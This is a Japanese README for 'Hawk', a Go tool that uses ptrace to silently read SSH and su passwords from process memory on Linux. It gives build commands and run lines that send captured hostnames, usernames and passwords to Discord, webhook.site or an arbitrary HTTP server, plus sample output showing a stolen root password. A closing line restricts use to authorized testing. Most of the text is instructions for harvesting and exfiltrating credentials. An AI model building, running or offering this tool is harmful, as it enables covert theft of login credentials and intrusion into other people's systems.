
sshd および su サービスを介して見つかったパスワードを流出させるために設計された Golang ツール
SSH および SU の認証情報をリアルタイムで静かに傍受する
Hawk は sshd および su プロセスを監視し、ptrace を介してメモリからパスワードを抽出します。対象プロセスを変更することはなく、読み取り専用の認証情報収集を実現します。

Hawk は Linux の /proc ファイルシステムを利用して SSH および SU プロセスを発見し、ptrace を使用してアタッチしシステムコールを傍受します。パスワード認証が発生すると、write() システムコールの際にプロセスメモリから直接パスワードを読み取ります。対象プロセスからは完全に透過的です。認証情報は Webhook 経由で外部に送信されるか、stdout に出力されます。
詳細解説: Blog Post
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk は Discord Webhook を自動検出し、フォーマットされたメッセージを送信します:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
設定: Discord の Webhook ガイドに従って、Discord サーバーに Webhook を作成してください。ホスト名、ユーザー名、パスワードがフォーマットされてチャンネルに表示されます。
その他の Webhook サービス(webhook.site、カスタムサーバー等)の場合:
# HTTPS(自動検出)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# プロトコル指定がない場合は自動的に HTTPS
./hawk webhook.example.com/path
Webhook がない場合、認証情報は stdout に出力されます:
./hawk
出力:
hostname=server01 username=root password=SuperSecret123
/proc ファイルシステムのマウントこのツールは、認可されたセキュリティテストおよび教育目的のみに使用してください。 システムへの不正アクセスは違法です。責任を持って、所有しているシステムまたは明示的なテスト許可があるシステムでのみ使用してください。